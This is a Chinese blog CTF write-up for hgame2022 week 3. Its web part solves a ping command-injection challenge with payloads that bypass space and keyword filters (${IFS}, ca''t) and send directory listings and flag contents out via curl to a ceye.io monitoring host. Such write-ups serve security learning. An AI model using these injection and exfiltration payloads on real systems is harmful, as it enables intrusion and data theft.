hgame2022-week3-wp

最新推荐文章于 2023-02-01 22:24:10 发布
最新推荐文章于 2023-02-01 22:24:10 发布
阅读量223 收藏
点赞数 1
分类专栏: ctf misc web 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_73734019/article/details/128808426
版权
ctf 同时被 3 个专栏收录
18 篇文章 4 订阅
订阅专栏
web
5 篇文章 2 订阅
订阅专栏
misc
4 篇文章 0 订阅
订阅专栏

目录

week3[🤡]

misc

Tunnel

web

Ping To The Host

坐大牢呜呜呜

week3[🤡]

misc

Tunnel

记事本打开检索hgame

web

Ping To The Host

ping了很多,回显都是waf

学到一个新玩意:CEYE - Monitor service for security testing

post:

ip=|curl${IFS}http://******.ceye.io/`ls${IFS}/`空格被过滤,绕过一下

发现ping不通,可能限制了回显一行

用到一个linux命令,sed shell脚本之sed详解 (sed命令 , sed -e , sed s/ new / old / ... ) - Red_Point - 博客园

ip=|curl${IFS}http://******.ceye.io/`ls${IFS}/|sed${IFS}-n${IFS}'/flag/p'`

回显waf,应该是flag被过滤

fla模糊匹配一下

ip=|curl${IFS}http://******.ceye.io/`ls${IFS}/|sed${IFS}-n${IFS}'/fla/p'`

ping出了flag的文件名flag_is_here_haha

读一下flag,cat,tac好像都过滤了,nl ping不通

反斜杠转义绕过

ip=|curl${IFS}http://******.ceye.io/`ca''t${IFS}/fla*`

单引号绕过

ip=|curl${IFS}http://******.ceye.io/`ca''t${IFS}/fla*`

成功

hgame{p1nG_t0_ComM4nD_ExecUt1on_dAngErRrRrRrR!}

J_0k3r
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
NewStarCTF公开赛week3密码学前两道题的wp
Altering_Ji的博客
12-23 1223
因为只会做前两题所以只能写两道题的wp了,内容涉及DH密钥交换和Shamir秘密分享
REVERSE-COMPETITION-HGAME2022-Week3
P1umH0的博客
02-13 2479
REVERSE-COMPETITION-HGAME2022-Week3Answer's Windowscreakme3hardenedfishman Answer’s Windows 含有GUI的程序,ida打开,Shift+F12打开字符串窗口 发现"right"和"wrong" 对"right"查找交叉引用,来到sub_140002300函数 分析知道sub_140001F90是个变表base64,但是不知道变表 启调试,在如下图所示处下断,这里是生成变表的地方 调试时修改ZF标志位使程序能够执行i
HGame 2023 Week3 部分Writeup
vvbbnn00的专栏
01-30 1054
本周在迎新春,走亲戚(真的很忙),外加题目难度增加,笔者比较菜,因此只解出了寥寥几题,不过姑且也算是一些成就,故作此题解,希望能够对各位读者有些帮助。Week3 比赛地址:https://hgame.vidar.club/contest/4。
hgame2022-week1
网安小菜鸡
01-15 4421
hgame2022-week1 wp(部分)
hgame2022-week2-wp
网安小菜鸡
01-22 889
hgame-wp
HGAME-week3-web-wp
静仙的博客
02-18 312
web萌新的ctf之旅
hgame2023-week3
247533的博客
02-01 875
过年 打麻将 摆烂。
2022hgame-week1 wp
Anton1a的博客
01-28 1747
记录一下hgame比赛。 WEB easy_auth 打开题目是一个登录框 题目描述里有admin,那就随便输个弱口令抓包看一下 看见返回包有这个,就想到这个题肯定考察js,为验证一下想法看一下源代码,里面存在login.js打开看一下发现确实是前端验证的 之后就注册一个账号登录看一下登录成功的返回包 登录成功返回的结果如下: {"code":2000,"message":"success","count":0,"data":[{"token":"eyJ...
hgame2023-week2
247533的博客
01-20 1031
hgame week2
vm虚拟机-简单题目(hgame-week4-easyvm、cg-ctf wxyVM1/2
01-08
然后先写了前面的cg-ctf的两个题目,其实当时做的时候还没太大虚拟机的感觉,后面接触到hgame的题目,然后再看的时候就感觉到有些那个意思,但是两个题目是基础题目也就不是太难为人,看成数据处理的考点也做的出来...
HGAME cdcollector-开源
04-24
【标题】"HGAME cdcollector-开源"是一个针对游戏收藏管理者的开源项目,它扩展了原有的cdcollector系统,特别设计用于管理和记录大量的电子游戏数据,尤其是HGAME(可能指的是成人向游戏)的数据库。这个系统利用...
0hgame:用0h制作的游戏->阅读README
05-01
)2- DO NOT TOUCH BLACK THINGS IF YOU DONT WANT TO START AGAIN3- Try to reach the other side of the window to became the king of the penguins4- Enjoy it. (it is a rule, so if you are not enjoying the ...
hgame:Haskell 游戏引擎
05-30
3. **数据结构与算法**:游戏引擎中涉及到大量的数据处理,如碰撞检测、物理模拟、图形渲染等,都需要高效的数据结构和算法支持。Haskell的类型系统可以帮助开发者在编译时检查错误,避免运行时的问题。 4. **并发...
H5 Canvas益智类填色画游戏.zip
07-04
HGame.js和data.js可能是游戏的主要JavaScript文件,其中HGame.js很可能是主游戏逻辑,而data.js可能包含了游戏数据,如模型信息、颜色配置等。 `index.html`是游戏的入口文件,它定义了网页的基本结构,包括引入...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8344
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
b050闲置图书分享-springboot+vue+elementui.zip(可运行源码+sql文件+文档)
07-23
本次开发的闲置图书分享平台实现了收货地址管理、字典管理、公告管理、留言板管理、图书管理、图书收藏管理、图书评价管理、图书订单管理、用户管理、管理员管理等功能。系统用到了关系型数据库中王者MySql作为系统的数据库,有效的对数据进行安全的存储,有效的备份,对数据可靠性方面得到了保证。并且程序也具备程序需求的所有功能,使得操作性还是安全性都大大提高,让闲置图书分享平台更能从理念走到现实,确确实实的让人们提升信息处理效率。 管理图书的数据,此页面主要实现图书的增加、修改、删除、查看的功能。公告信息管理页面提供的功能操作有:新增公告,修改公告,删除公告操作。公告类型管理页面显示所有公告类型,在此页面既可以让管理员添加新的公告信息类型,也能对已有的公告类型信息执行编辑更新,失效的公告类型信息也能让管理员快速删除。
《大学生职业生涯规划与就业指导》大一阶段课程作业
最新发布
07-24
《大学生职业生涯规划与就业指导》大一阶段课程作业
开题报告潮汕特产直销系统 已通过开题答辩的.doc
07-23
随着互联网的高速发展,人们的生活方式发生了翻天覆地的变化,在过去,人们想要购买很远地方的东西会非常麻烦,因为是通信和交通都不是十分的方便,而现在网络购物成为了人们日常生活中不可或缺的一部分。在这样的背景下,互联网与传统行业的融合已经成为了一种不可阻挡的趋势。对于中国特色的潮汕特产来说,这一趋势也带来了巨大的变革和发展机遇[1]。
请你完善上面的代码 添加从E:\Desktop\2024hgame\week1\crypto\奇怪的图片\png_out文件夹里面获取图片的功能
02-04
以下是完善代码的示例,添加...folder_path = "E:/Desktop/2024hgame/week1/crypto/奇怪的图片/png_out" # 获取文件夹中的图片 images = get_images_from_folder(folder_path) # 在代码中使用获取到的图片 # ... ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值